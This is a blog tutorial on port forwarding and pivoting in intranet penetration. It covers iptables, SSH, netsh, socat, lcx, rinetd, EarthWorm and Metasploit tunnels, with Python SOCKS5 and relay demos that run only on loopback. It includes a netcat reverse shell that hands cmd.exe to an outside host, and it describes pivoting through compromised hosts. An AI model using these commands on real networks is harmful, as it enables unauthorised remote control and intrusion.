Port forwarding in intranet penetration

Keep in mind that the whole penetration process proceeds from web applications or from open ports. Getting a webshell is only a small part of the craft. Intranet penetration in a real, intricate enterprise environment goes much deeper: it involves pivoting into the intranet, port forwarding, domain penetration, privilege escalation and a series of related problems. This article records some notes from learning intranet penetration. Along the way I drew on the valuable experience of many predecessors; I collected those links and put them in the references section.

forwarding, mapping, proxying

These concepts are hard to keep apart, especially once they get mixed up with the intranet penetration material later on. From a distance there is little difference between them, but in essence they differ quite a bit. Here is my personal understanding of each:

  • Forwarding: forwarding is a technique. Port forwarding takes the traffic arriving on a port of one network node and passes it on to another node. The result is that an external user reaches a port on an internal IP address through the NAT router in between. It is sometimes also called a tunnel.
  • Mapping: mapping is also a technique. Port mapping exposes a port on the external host's IP address and maps it to a machine inside the network, so that machine's service is served from the external address. In fact, many times forwarding and mapping
  • Proxy: a proxy is a result, built on top of port forwarding and mapping. Proxies are widely used in front of Internet-facing web services to get around IP blocking and to hide identity. The principle is dynamic port forwarding: only a tunnel between the local machine and the proxy is needed, and the proxy then works out the outgoing destination address and port dynamically from each request the local machine makes.
  • Intranet penetration: this is the goal, and the means it uses are port forwarding and mapping, or simply the result of a proxy. In many cases the "intranet penetration scenario" means the attacking machine and the target machine sit on different private networks, so a simple method such as a reverse shell cannot be set up directly, because the two IP addresses cannot reach each other. That is when the common intranet penetration tools come in; they rely on port forwarding, port mapping or similar techniques to get past the restriction.
Tool | Main purpose | Platform | Remarks
lcx | Port mapping | Windows | Forwards TCP only; not built into the system. The Linux build is distributed under the name portmap.
netsh | Port mapping | Windows | Forwards TCP only; on older Windows versions the IPv6 stack must be installed first.
rinetd | Port redirection (reverse proxy) | Linux | Not built in; install it yourself.
EarthWorm (ew) | Port mapping, SOCKS5 proxy | Linux, Windows, macOS, ARM Linux | Not built in; multi-level forwarding is very convenient.
frp | High-performance reverse proxy | Go (cross-platform) | Reverse-proxy based; very flexible for intranet penetration and firewall bypass.
reGeorg | SOCKS5 proxy | Common web scripting languages | Builds a SOCKS proxy on top of a webshell; the server must run aspx, php, jsp, js or similar.
Metasploit portfwd | Port mapping | MSF, inside a Meterpreter session | Needs a stable network path.
socat | Port mapping | Linux | May need to be installed.
Metasploit socks4a | SOCKS proxy (reverse) | MSF, inside a Meterpreter session | The proxy is served from the MSF host and uses the session as the hop.
Tunna | HTTP tunnel | Common web scripting languages | Needs a scripting runtime on the server; not very stable.
Localtunnel | Intranet to public network mapping | Node.js | Like ngrok: maps an internal port onto a public endpoint.
ngrok | Intranet to public network mapping | Go | Either run your own server or use the one the service provides.
dns2tcp | DNS tunnel | Built into Kali | When the firewall filters outbound TCP, go through a DNS tunnel and relay the TCP connection over DNS traffic.
Iodine | DNS tunnel | Linux | Same principle as dns2tcp.
icmpsh | ICMP tunnel | Needs root | The system's own ICMP echo replies must be disabled so the tool can handle sending and receiving ICMP itself.

System built-in forwarding tool

iptables NAT function

For security reasons a Linux host ships with the kernel parameter /proc/sys/net/ipv4/ip_forward set to 0, so packets are not forwarded between interfaces and NAT cannot work. The parameter can be changed on the running system in the following two ways.

Temporary (lost at reboot)

echo 1 >/proc/sys/net/ipv4/ip_forward

Persistent

Run vi /etc/sysctl.conf

# Find the line below and change 0 to 1

net.ipv4.ip_forward = 1

Run sysctl -p for the change to take effect immediately.

Here is a forwarding example:

# 1.1.1.1 is the public IP of this host, 192.168.2.2 is the internal target
iptables -t nat -A PREROUTING  -p tcp -d 1.1.1.1 --dport 80 -j DNAT --to-destination 192.168.2.2:8080

# Rewrite the source of the forwarded packets so the target answers back through this host.
# Only needed when this host is not the target's default gateway (conntrack undoes both
# translations on the reply path; an SNAT rule matching the replies themselves does nothing,
# because the NAT table is only consulted for the first packet of a connection).
iptables -t nat -A POSTROUTING -p tcp -d 192.168.2.2 --dport 8080 -j MASQUERADE

# persist the rules (CentOS 6 style; newer distributions use iptables-save instead)
service iptables save

This maps access to 1.1.1.1:80 onto 192.168.2.2:8080. Two things to check before assuming it works: ip_forward must be 1 (see above), and the FORWARD chain of the filter table must accept traffic to 192.168.2.2:8080, since a default DROP policy there silently kills the forwarded connections.

nc

# Public host: listen and wait for the callback
nc -lvp 4444

# Intranet (Windows) machine: connect out and hand cmd.exe to the socket.
# This is a reverse shell rather than a forward; it works because only an outbound
# connection is needed. -e exists in the Windows/"traditional" netcat builds only.
nc -t -e cmd.exe <public host IP> 4444

SSH

# Local port forwarding: connections to port1 on this machine are carried through host
# and delivered to 127.0.0.1:port2 as seen from host
ssh -CfNg -L port1:127.0.0.1:port2 user@host
# -L [local bind address:]local port:target address:target port

# Remote port forwarding: host listens on port2, and connections arriving there are
# tunnelled back and delivered to 127.0.0.1:port1 on this machine
ssh -CfNg -R port2:127.0.0.1:port1 user@host
# -R [remote bind address:]remote port:target address:target port

# Dynamic port forwarding: a SOCKS proxy on localhost:2000 whose outbound connections leave from host
ssh -D localhost:2000 user@host
# -D [local bind address:]local port

# Flags: -C compress, -f go to the background after authentication, -N run no remote command,
# -g let other hosts connect to the forwarded port (without it the listener binds to loopback only)

Note that with -R the listener on host binds to loopback only unless the server's sshd_config has GatewayPorts enabled, however the bind address is written.

netsh

Netsh is the command-line network configuration tool on Windows. It is an interactive shell built around contexts: you enter the relevant context in interactive mode and set parameters there. Port forwarding can also be done non-interactively, as below. portproxy rules survive reboots, and netsh interface portproxy show all lists the active ones, which is worth checking (and cleaning up) after an engagement.

# only needed on old systems (XP/2003) where the IPv6 stack is not installed yet
netsh interface ipv6 install
# forward: connections to 10.10.18.1:4455 are relayed to 10.10.12.1:8080
netsh interface portproxy add v4tov4 listenaddress=10.10.18.1 listenport=4455 connectaddress=10.10.12.1 connectport=8080

# delete the forwarding rule
netsh interface portproxy delete v4tov4 listenaddress={B's IP} listenport={B's port}

Non-built-in port forwarding tools

socat

In practice we use socat's port forwarding most often to capture packets locally while building SSRF payloads, because socat can log the forwarded stream (its -v option dumps the relayed data). socat sits in the middle and captures the payload we constructed, which can then be worked on further, for example turned into a gopher:// payload.

# install
yum install -y socat
apt install -y socat

# TCP
nohup socat TCP4-LISTEN:10000,reuseaddr,fork TCP4:1.1.1.1:10000 &

TCP4-LISTEN:10000   listen on IPv4 TCP port 10000; replace 10000 with the port you need to forward
reuseaddr,fork      allow immediate rebinding of the port and handle each client in a child process, so several connections can be served
TCP4:1.1.1.1:10000  forward to port 10000 of 1.1.1.1; change the IP and port to suit
nohup ... &         run in the background; the command can also be put in /etc/rc.local to start at boot

# UDP (-T 600 drops a relayed session after 600 s without traffic)
nohup socat -T 600 UDP4-LISTEN:10000,reuseaddr,fork UDP4:1.1.1.1:10000 &

lcx.exe

lcx -<listen|tran|slave> <option> [-log logfile]
[option:]

 -listen <listen port> <forward port>

 -tran <listen port> <target host> <target port>

 -slave <target host> <target port> <local host> <local port>


On the intranet machine:
lcx.exe -slave <public IP> <port> <intranet IP> <port>
Example:
lcx.exe -slave 192.168.43.142 51 192.168.43.137 3389
On the public host:
lcx.exe -listen <port> <port>    listen on the first port for the slave's connection and on the second for us; the two are bridged
Example:
lcx.exe -listen 51 3389

With both running, an RDP client pointed at port 3389 of the public host ends up talking to 192.168.43.137:3389 inside the intranet (in this lab example the "public" address is itself a private one). The intranet machine only ever makes outbound connections, which is why this pattern works through inbound-only filtering.

Metasploit socks4a

A trio used in real engagements: routing table + socks4a + proxychains. It lets the penetration tools on the attacking machine use a Meterpreter session as the pivot into the intranet. The flow:

1. Add a route for the target subnet in the Meterpreter session, e.g.
run autoroute -s 192.168.122.0/24
2. Load the socks4a module, set its port and run it
use auxiliary/server/socks4a
3. Configure proxychains

For step 3 the entry in /etc/proxychains.conf is socks4 127.0.0.1 1080 (1080 is the module's default SRVPORT); every tool started with proxychains then has its connections routed through the session. Two notes for current Metasploit releases: run autoroute is deprecated in favour of the post/multi/manage/autoroute module, and socks4a has been folded into auxiliary/server/socks_proxy, where the VERSION option selects 4a or 5.

Meterpreter portfwd

The MSF framework has a port forwarding command built into Meterpreter, usable directly once a shell has called back. The options are explained below.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.


Examples:
# forward: 127.0.0.1:1212 on the attacking machine is relayed through the session to 10.10.12.1:3389
portfwd add -L 127.0.0.1 -l 1212 -r 10.10.12.1 -p 3389

# reverse: the session host listens on 10.10.12.1:8877; connections arriving there are carried back
# to the attacking machine and delivered to 10.10.18.1:8080
portfwd add -R -L 10.10.18.1 -l 8080 -r 10.10.12.1 -p 8877

Rinetd

# Installation. Note that CentOS has no package for it in the default repositories, so one has to be added by hand
# (the el6 paths below target CentOS 6); on Ubuntu it is easier.
# CentOS 32-bit
$ vim /etc/yum.repos.d/nux-misc.repo
[nux-misc]
name=Nux Misc
baseurl=http://li.nux.ro/download/nux/misc/el6/i386/
enabled=0
gpgcheck=1
gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro

# CentOS 64-bit
$ vim /etc/yum.repos.d/nux-misc.repo

[nux-misc]
name=Nux Misc
baseurl=http://li.nux.ro/download/nux/misc/el6/x86_64/
enabled=0
gpgcheck=1
gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro

$ yum --enablerepo=nux-misc install rinetd

# Ubuntu
$ apt-get install rinetd

# The configuration file is /etc/rinetd.conf; each forwarding rule is one line in this format
# (rinetd forwards TCP only):
[bindaddress] [bindport] [connectaddress] [connectport]
address and port to listen on, then the address and port to connect to
(in other words: source address, source port, destination address, destination port)

# Example
$ vim /etc/rinetd.conf

0.0.0.0 8080 172.19.94.3 8080
0.0.0.0 2222 192.168.0.103 3389
1.2.3.4 80 192.168.0.10 80
allow *.*.*.*
logfile /var/log/rinetd.log

# Explanation
0.0.0.0 means bind every address of this machine
every request to port 8080 of this machine is forwarded to 172.19.94.3:8080
every request to port 2222 of this machine is forwarded to 192.168.0.103:3389
every request to 1.2.3.4:80 is forwarded to 192.168.0.10:80
allow sets which client IPs may use the forwards; *.*.*.* means every address
(on an Internet-facing host, narrow this to your own address rather than exposing the forwarded intranet service to everyone)
logfile sets where the log is written

# Running
# via the init script
$ /etc/init.d/rinetd start

# via the binary directly
$ /usr/sbin/rinetd -c /etc/rinetd.conf

# Stopping (use the init script, or pkill)
$ /etc/init.d/rinetd stop

Tunna and reGeorg

Both tools are simple to use, so I won't belabour them: once we have a webshell, they let us forward ports over HTTP. Here are the two project links; reGeorg is recommended, Tunna is unstable. Tunna project page
reGeorg project page

Localtunnel and ngrok

Both tools map an intranet port onto the public network, so that visiting the public IP is like reaching the intranet port. Both can be run against a self-hosted server or the servers the project provides. Tools of this kind are actually not used much in real penetration work. The more direct use case is when the attacking machine itself sits on an intranet and has to be reachable by the target for callbacks; after all they are only single-hop forwarders, and they are fiddly to operate. Project links:

EW

Project page: EarthWorm

This is a home-grown (Chinese) tunnelling gem; its convenient multi-level forwarding and reverse proxy support have made it well known in intranet penetration. I'll record this tool in some detail here, because it really is powerful!

The tool has six command modes (ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran). The official examples are explained below:

Forward proxy

$ ./ew -s ssocksd -l 1080

This opens port 1080 on the machine as a forward SOCKS5 proxy; we connect to that port and route our traffic through it. The typical scenario: Kali connects through proxychains to a public host that runs this forward proxy.
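What a forward SOCKS proxy actually does, whether it comes from ew -s ssocksd, from ssh -D or from the Metasploit socks modules, is the "dynamic port forwarding" described under proxies at the top of this article: the destination is read from each client request rather than fixed at startup. The following is an added example, not EarthWorm's code nor that of any of the other tools: a minimal SOCKS5 CONNECT server plus the client side of the handshake (the part proxychains or a browser performs), exercised against a constructed loopback service. The loopback addresses, the ephemeral ports and the "hello" service are assumptions for the demo; only the no-authentication method and the CONNECT command are implemented.

```python
import select
import socket
import struct
import threading

NO_AUTH = b"\x05\x00"  # method-selection reply: SOCKS version 5, "no authentication required"


def _recv_exact(sock, n):
    """Read exactly n bytes (blocking sockets); every handshake field has a fixed size."""
    buf = sock.recv(n, socket.MSG_WAITALL)
    if len(buf) != n:
        raise ConnectionError("peer closed mid-handshake")
    return buf


def parse_connect_request(sock):
    """Server side of greeting + request (RFC 1928); returns the (host, port) the client asked for."""
    ver, nmethods = _recv_exact(sock, 2)
    if ver != 5:
        raise ValueError("not a SOCKS5 client")
    _recv_exact(sock, nmethods)  # offered auth methods; this proxy always picks "none"
    sock.sendall(NO_AUTH)
    ver, cmd, _rsv, atyp = _recv_exact(sock, 4)
    if ver != 5 or cmd != 1:  # 1 = CONNECT; BIND and UDP ASSOCIATE are not handled
        raise ValueError("unsupported command %d" % cmd)
    if atyp == 1:  # IPv4 literal
        host = socket.inet_ntoa(_recv_exact(sock, 4))
    elif atyp == 3:  # domain name: the proxy resolves it, so the client leaks no DNS queries
        host = _recv_exact(sock, _recv_exact(sock, 1)[0]).decode()
    else:
        raise ValueError("address type %d not supported" % atyp)  # IPv6 (4) omitted here
    return host, struct.unpack("!H", _recv_exact(sock, 2))[0]


def _relay(a, b):
    """Shuttle bytes both ways until either side closes, then close both."""
    while True:
        for s in select.select([a, b], [], [])[0]:
            data = s.recv(4096)
            if not data:
                a.close()
                b.close()
                return
            (b if s is a else a).sendall(data)


def _handle_client(client):
    try:
        upstream = socket.create_connection(parse_connect_request(client), timeout=10)
    except (OSError, ValueError):
        client.sendall(b"\x05\x01\x00\x01" + b"\x00" * 6)  # REP=1 "general failure" instead of a hang
        client.close()
        return
    ip, port = upstream.getsockname()[:2]  # IPv4 upstream assumed when building BND.ADDR
    client.sendall(b"\x05\x00\x00\x01" + socket.inet_aton(ip) + struct.pack("!H", port))
    _relay(client, upstream)


def serve(handler):
    """Accept loop on an ephemeral 127.0.0.1 port in a daemon thread; returns the port."""
    srv = socket.create_server(("127.0.0.1", 0))

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def socks5_connect(proxy_port, host, port):
    """Client half (what proxychains or a browser does); sends the name so the proxy resolves it."""
    s = socket.create_connection(("127.0.0.1", proxy_port))
    s.sendall(b"\x05\x01\x00")  # version 5, one method offered: no auth
    if _recv_exact(s, 2) != NO_AUTH:
        raise ConnectionError("proxy refused the no-auth method")
    name = host.encode()
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", port))
    _ver, rep, _rsv, atyp = _recv_exact(s, 4)
    if rep != 0:
        raise ConnectionError("CONNECT failed, rep=%d" % rep)
    _recv_exact(s, 6 if atyp == 1 else 18)  # skip BND.ADDR + BND.PORT
    return s


def _line_service(conn):  # constructed stand-in for an intranet service: answer and hang up
    conn.sendall(b"hello " + conn.recv(1024))
    conn.close()


def demo():
    """Reach the loopback service through the proxy by name; returns the service's reply."""
    s = socks5_connect(serve(_handle_client), "localhost", serve(_line_service))
    s.sendall(b"ping\n")
    reply = b""
    while chunk := s.recv(1024):
        reply += chunk
    s.close()
    return reply


def demo_refused():  # CONNECT to a port nobody listens on: the proxy must answer REP=1, not hang
    proxy_port = serve(_handle_client)
    with socket.create_server(("127.0.0.1", 0)) as probe:
        closed_port = probe.getsockname()[1]  # released again when the with-block ends
    try:
        socks5_connect(proxy_port, "127.0.0.1", closed_port)
    except ConnectionError as err:
        return str(err)
    return "no error"
```

Because the client sends the name ("localhost") as a domain-name address, the proxy performs the DNS lookup. That is the difference between socks4 and socks4a/socks5 that matters when proxychains is configured, and it is why name resolution for intranet hosts happens on the pivot rather than on the attacking machine. demo_refused shows the other half of correct behaviour: a CONNECT to a dead port gets a failure reply instead of a hanging connection, which is what lets a scanner pushed through the proxy finish.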

Reverse proxy

# public host A, assume its IP is 1.1.1.1
./ew -s rcsocks -l 1080 -e 8888

# target host B
./ew -s rssocks -d 1.1.1.1 -e 8888

With a reverse proxy the target initiates the connection to us, the opposite of the forward proxy. Once the link is up the proxy chain is Me <---> A <---> B: I only need to connect to port 1080 on A to get a reverse proxy tunnel that ends on B. This scenario works around firewalls with a strict inbound but loose outbound policy.

Multi-level forwarding

In the two scenarios above we saw the rcsocks, ssocksd and rssocks commands. Multi-level forwarding uses the other three; they act like middleware, steering the tunnel and chaining its segments together.

# usage examples:
# lcx_listen: listen on two local ports and bridge them
$ ./ew -s lcx_listen -l  1080   -e 8888
# lcx_tran: bridge a local listening port to a port on a destination IP
$ ./ew -s lcx_tran   -l  1080   -f 2.2.2.3 -g 9999
# lcx_slave: connect out to two hosts that are directly reachable from this machine and bridge them
$ ./ew -s lcx_slave  -d 1.1.1.1 -e 8888    -f 2.2.2.3  -g  9999

Now a real three-level cascade from an engagement:

# on our own VPS: accept the reverse tunnel on 8888, serve our SOCKS clients on 1080
$ ./ew -s rcsocks -l 1080 -e 8888

# on jump host A: -d must point at the host where rcsocks listens, i.e. the VPS
$ ./ew -s lcx_slave -d ip_VPS -e 8888 -f ip_B -g 9999

# on jump host B
$ ./ew -s lcx_listen -l 9999 -e 7777

# on jump host C
$ ./ew -s rssocks -d ip_B -e 7777

Data flow: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks.
Reading this three-level cascade: it is a reverse proxy setup whose far end is rssocks on C, reached through port 7777 on B. Once the tunnel is up we only connect to port 1080 on the VPS and the traffic is carried all the way to C. Step by step: the first command makes the VPS receive the reverse tunnel on 8888 and wait for our connections on 1080; the second has jump host A connect out to VPS:8888 and to B:9999 and bridge the two; the third has jump host B bridge its ports 9999 and 7777; the last has jump host C dial out to B:7777 and serve the SOCKS requests that arrive through it. Each hop only needs an outbound connection to the next, which is what makes the chain usable through strict inbound filtering.
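All three lcx modes, and their EarthWorm namesakes lcx_tran, lcx_listen and lcx_slave used in the cascade above, reduce to the same plumbing: two TCP sockets glued together, differing only in which side listens and which side dials. The following added example (not lcx's or EarthWorm's code) re-implements the three modes in Python and runs both the forward pattern (tran) and the reverse pattern (listen + slave, where the "intranet" side only makes outbound connections) against a constructed echo service on loopback. The echo service, the loopback binding and the payloads are assumptions for the demo.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src sends EOF, then pass the EOF on as a half-close."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def bridge(a, b):
    """Relay in both directions; when both directions are done, close both sockets."""
    threads = [threading.Thread(target=_pump, args=pair, daemon=True) for pair in ((a, b), (b, a))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def _spawn(fn, *args):
    threading.Thread(target=fn, args=args, daemon=True).start()


def tran(listen_port, target_host, target_port):
    """lcx -tran / ew lcx_tran: accept here, connect onward to the target, bridge the two. Returns the bound port."""
    srv = socket.create_server(("127.0.0.1", listen_port))  # 0.0.0.0 in real use; loopback keeps the demo local

    def loop():
        while True:
            client, _ = srv.accept()
            _spawn(bridge, client, socket.create_connection((target_host, target_port)))
    _spawn(loop)
    return srv.getsockname()[1]


def listen(port_a, port_b):
    """lcx -listen / ew lcx_listen: open two ports and pair the connection on the first
    with the next one on the second. Returns the two bound ports."""
    sa = socket.create_server(("127.0.0.1", port_a))
    sb = socket.create_server(("127.0.0.1", port_b))

    def loop():
        while True:
            inner, _ = sa.accept()  # the slave on the intranet side dials in here first...
            outer, _ = sb.accept()  # ...then the operator connects here
            _spawn(bridge, inner, outer)
    _spawn(loop)
    return sa.getsockname()[1], sb.getsockname()[1]


def slave(host_a, port_a, host_b, port_b):
    """lcx -slave / ew lcx_slave: dial out to both ends and bridge them; nothing inbound is needed."""
    _spawn(bridge, socket.create_connection((host_a, port_a)), socket.create_connection((host_b, port_b)))


def echo_server():
    """Constructed stand-in for the intranet service (the 3389 in the lcx example): echoes its input."""
    srv = socket.create_server(("127.0.0.1", 0))

    def loop():
        while True:
            conn, _ = srv.accept()
            _spawn(_pump, conn, conn)
    _spawn(loop)
    return srv.getsockname()[1]


def round_trip(port, payload):
    """Connect to 127.0.0.1:port, send payload, half-close, and collect everything that comes back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while chunk := s.recv(4096):
            out += chunk
    return out


def demo():
    """Run both patterns on loopback; returns what each one carried back from the echo service."""
    service = echo_server()
    # forward pattern (tran): we connect to the forwarder, which connects onward to the service
    via_tran = round_trip(tran(0, "127.0.0.1", service), b"via tran\n")
    # reverse pattern (listen + slave): the "intranet" side dials out to the listener's first port
    # and to the service, then we connect to the listener's second port
    port_a, port_b = listen(0, 0)
    slave("127.0.0.1", port_a, "127.0.0.1", service)
    via_reverse = round_trip(port_b, b"via listen+slave\n")
    return via_tran, via_reverse
```

The half-close handling in _pump is the detail that matters in practice: a forwarder that closes both directions as soon as one side sends EOF loses the reply still in flight, which shows up as truncated responses through the tunnel. Real deployments bind 0.0.0.0 instead of loopback, and rcsocks/rssocks are exactly this listen/slave pairing with a SOCKS layer on top.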

FRP

frp also offers complete intranet penetration functionality. Feature-wise it is much like ngrok, but its configuration is more flexible. Recommendation order: FRP > Localtunnel > ngrok.

Official Chinese documentation

Tunnels through the firewall

The port forwarding introduced above runs over HTTP, TCP or a SOCKS proxy, but traffic forwarded over those protocols is conspicuous and easily filtered by strict firewall rules, leaving the shell stuck inside the intranet. In that situation we need a tunnel that can get through the wall. Below are some DNS tunnels over UDP and ICMP tunnels I found online; both hole-punching techniques are quite ingenious, and I was amazed reading about them. For now I'm just noting the tool links and the articles I read. I'm out of steam... to keep this from getting too long (honestly, I'm a bit lazy), I'll fill it in next time.

Origin blog.csdn.net/xv7777666/article/details/130622497